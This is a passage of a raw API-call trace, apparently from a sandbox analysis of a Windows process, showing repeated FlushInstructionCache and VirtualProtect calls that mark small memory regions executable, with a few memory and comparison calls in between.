0xffffffff [0093.864] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0093.864] GetCurrentProcess () returned 0xffffffff [0093.864] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0093.864] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.865] GetCurrentProcess () returned 0xffffffff [0093.865] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0093.865] GetCurrentProcess () returned 0xffffffff [0093.865] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0093.865] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.866] GetCurrentProcess () returned 0xffffffff [0093.866] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0093.866] GetCurrentProcess () returned 0xffffffff [0093.866] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0093.866] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.867] GetCurrentProcess () returned 0xffffffff [0093.867] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0093.867] GetCurrentProcess () returned 0xffffffff [0093.867] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0093.867] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.868] GetCurrentProcess () returned 0xffffffff [0093.868] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0093.868] GetCurrentProcess () returned 0xffffffff [0093.868] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0093.868] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.869] GetCurrentProcess () returned 0xffffffff [0093.869] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0093.869] GetCurrentProcess () returned 0xffffffff [0093.869] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0093.869] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.870] GetCurrentProcess () returned 0xffffffff [0093.870] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0093.870] GetCurrentProcess () returned 0xffffffff [0093.870] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0093.870] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.870] GetCurrentProcess () returned 0xffffffff [0093.870] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0093.870] GetCurrentProcess () returned 0xffffffff [0093.870] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0093.870] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.871] GetCurrentProcess () returned 0xffffffff [0093.871] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0093.871] GetCurrentProcess () returned 0xffffffff [0093.871] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0093.871] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.872] GetCurrentProcess () returned 0xffffffff [0093.872] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0093.872] GetCurrentProcess () returned 0xffffffff [0093.872] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0093.872] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.873] GetCurrentProcess () returned 0xffffffff [0093.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0093.873] GetCurrentProcess () returned 0xffffffff [0093.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0093.873] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.873] GetCurrentProcess () returned 0xffffffff [0093.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0093.874] GetCurrentProcess () returned 0xffffffff [0093.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0093.874] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.874] GetCurrentProcess () returned 0xffffffff [0093.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0093.874] GetCurrentProcess () returned 0xffffffff [0093.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0093.874] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.875] GetCurrentProcess () returned 0xffffffff [0093.875] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0093.875] GetCurrentProcess () returned 0xffffffff [0093.875] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.875] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.876] GetCurrentProcess () returned 0xffffffff [0093.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.876] GetCurrentProcess () returned 0xffffffff [0093.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.876] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.877] GetCurrentProcess () returned 0xffffffff [0093.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0093.877] GetCurrentProcess () returned 0xffffffff [0093.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0093.877] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.878] GetCurrentProcess () returned 0xffffffff [0093.878] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0093.878] GetCurrentProcess () returned 0xffffffff [0093.878] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0093.878] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.879] GetCurrentProcess () returned 0xffffffff [0093.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0093.879] GetCurrentProcess () returned 0xffffffff [0093.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0093.879] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.880] GetCurrentProcess () returned 0xffffffff [0093.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0093.880] GetCurrentProcess () returned 0xffffffff [0093.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0093.880] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.880] GetCurrentProcess () returned 0xffffffff [0093.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0093.880] GetCurrentProcess () returned 0xffffffff [0093.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0093.880] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.881] GetCurrentProcess () returned 0xffffffff [0093.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0093.881] GetCurrentProcess () returned 0xffffffff [0093.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0093.881] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.882] GetCurrentProcess () returned 0xffffffff [0093.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0093.882] GetCurrentProcess () returned 0xffffffff [0093.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0093.882] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.936] GetCurrentProcess () returned 0xffffffff [0093.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0093.936] GetCurrentProcess () returned 0xffffffff [0093.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0093.936] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.937] GetCurrentProcess () returned 0xffffffff [0093.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0093.937] GetCurrentProcess () returned 0xffffffff [0093.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0093.937] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.938] GetCurrentProcess () returned 0xffffffff [0093.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0093.938] GetCurrentProcess () returned 0xffffffff [0093.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0093.938] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.940] GetCurrentProcess () returned 0xffffffff [0093.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0093.941] GetAsyncKeyState (vKey=3) returned 0 [0093.941] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0093.941] CRetailMalloc_Alloc () returned 0xf4db4e0 [0093.941] memcpy (in: _Dst=0xb2a5168, _Src=0x19731c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.941] memcpy (in: _Dst=0xf4db500, _Src=0x197384, _Size=0x18 | out: _Dst=0xf4db500) returned 0xf4db500 [0093.941] CRetailMalloc_Realloc () returned 0xf4db4e0 [0093.942] CRetailMalloc_Free () returned 0x1 [0093.942] GetCurrentProcess () returned 0xffffffff [0093.942] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0093.942] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.943] GetCurrentProcess () returned 0xffffffff [0093.943] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0093.943] GetCurrentProcess () returned 0xffffffff [0093.943] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0093.943] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.944] GetCurrentProcess () returned 0xffffffff [0093.944] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0093.944] GetCurrentProcess () returned 0xffffffff [0093.944] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0093.944] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.945] GetCurrentProcess () returned 0xffffffff [0093.945] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0093.945] GetCurrentProcess () returned 0xffffffff [0093.945] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0093.945] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.946] GetCurrentProcess () returned 0xffffffff [0093.946] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0093.946] GetCurrentProcess () returned 0xffffffff [0093.946] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0093.946] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.947] GetCurrentProcess () returned 0xffffffff [0093.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0093.947] GetCurrentProcess () returned 0xffffffff [0093.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0093.947] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.948] GetCurrentProcess () returned 0xffffffff [0093.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0093.948] GetCurrentProcess () returned 0xffffffff [0093.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0093.948] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.949] GetCurrentProcess () returned 0xffffffff [0093.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0093.949] GetCurrentProcess () returned 0xffffffff [0093.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0093.949] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.950] GetCurrentProcess () returned 0xffffffff [0093.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0093.950] GetCurrentProcess () returned 0xffffffff [0093.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0093.950] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.951] GetCurrentProcess () returned 0xffffffff [0093.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0093.951] GetCurrentProcess () returned 0xffffffff [0093.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0093.951] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.951] GetCurrentProcess () returned 0xffffffff [0093.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0093.952] GetCurrentProcess () returned 0xffffffff [0093.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0093.952] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.952] GetCurrentProcess () returned 0xffffffff [0093.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0093.952] GetCurrentProcess () returned 0xffffffff [0093.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0093.953] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.953] GetCurrentProcess () returned 0xffffffff [0093.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0093.953] GetCurrentProcess () returned 0xffffffff [0093.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0093.953] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.954] GetCurrentProcess () returned 0xffffffff [0093.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0093.954] GetCurrentProcess () returned 0xffffffff [0093.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0093.954] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.955] GetCurrentProcess () returned 0xffffffff [0093.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0093.955] GetCurrentProcess () returned 0xffffffff [0093.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0093.955] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.956] GetCurrentProcess () returned 0xffffffff [0093.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0093.956] GetCurrentProcess () returned 0xffffffff [0093.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0093.956] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.962] GetCurrentProcess () returned 0xffffffff [0093.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0093.962] GetCurrentProcess () returned 0xffffffff [0093.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0093.962] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.963] GetCurrentProcess () returned 0xffffffff [0093.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0093.963] GetCurrentProcess () returned 0xffffffff [0093.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0093.963] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.963] GetCurrentProcess () returned 0xffffffff [0093.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0093.963] GetCurrentProcess () returned 0xffffffff [0093.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0093.969] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.971] GetCurrentProcess () returned 0xffffffff [0093.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0093.972] GetCurrentProcess () returned 0xffffffff [0093.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.972] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.974] GetCurrentProcess () returned 0xffffffff [0093.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.975] GetCurrentProcess () returned 0xffffffff [0093.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.975] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0093.987] GetCurrentProcess () returned 0xffffffff [0094.003] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0094.003] GetCurrentProcess () returned 0xffffffff [0094.003] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0094.004] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.008] GetCurrentProcess () returned 0xffffffff [0094.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0094.008] GetCurrentProcess () returned 0xffffffff [0094.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0094.011] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.022] GetCurrentProcess () returned 0xffffffff [0094.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0094.023] GetCurrentProcess () returned 0xffffffff [0094.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0094.024] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.025] GetCurrentProcess () returned 0xffffffff [0094.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0094.025] GetCurrentProcess () returned 0xffffffff [0094.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0094.025] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.025] GetCurrentProcess () returned 0xffffffff [0094.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0094.026] GetCurrentProcess () returned 0xffffffff [0094.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0094.026] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.026] GetCurrentProcess () returned 0xffffffff [0094.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0094.026] GetCurrentProcess () returned 0xffffffff [0094.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0094.027] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.027] GetCurrentProcess () returned 0xffffffff [0094.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0094.027] GetCurrentProcess () returned 0xffffffff [0094.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0094.027] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.028] GetCurrentProcess () returned 0xffffffff [0094.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0094.028] GetCurrentProcess () returned 0xffffffff [0094.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0094.028] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.029] GetCurrentProcess () returned 0xffffffff [0094.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0094.029] GetCurrentProcess () returned 0xffffffff [0094.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0094.029] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.030] GetCurrentProcess () returned 0xffffffff [0094.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0094.030] GetCurrentProcess () returned 0xffffffff [0094.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0094.030] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0094.041] GetCurrentProcess () returned 0xffffffff [0094.041] FlushInstructionCache 